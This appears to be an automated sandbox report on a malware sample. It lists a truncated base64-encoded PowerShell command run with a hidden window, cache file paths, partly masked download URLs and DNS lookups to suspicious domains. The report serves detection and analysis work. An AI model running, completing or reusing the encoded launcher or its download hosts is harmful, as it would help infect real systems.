Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAEYATABJAEIAbQBpAG0APQAnAEEAWABVAEwAUgBwAHIAagAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwBVAFIAaQBUAHkAUABgAFIATwB0AG8AYABjAGAATwBMACIAIAA9AC...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- http://ro####ntheos.com/dmctq/pbrp_l_1ide/
- http://sw####ommerce.com/wp-content/uploads/ttf_mn_e30rtucds7/
- DNS ASK ro####ntheos.com
- DNS ASK sw####ommerce.com
- DNS ASK ji##isp.com
- DNS ASK le##r.xyz
- DNS ASK cr####elopments.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAEYATABJAEIAbQBpAG0APQAnAEEAWABVAEwAUgBwAHIAagAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwBVAFIAaQBUAHkAUABgAFIATwB0AG8AYABjAGAATwBMACIAIAA9AC...' (with hidden window)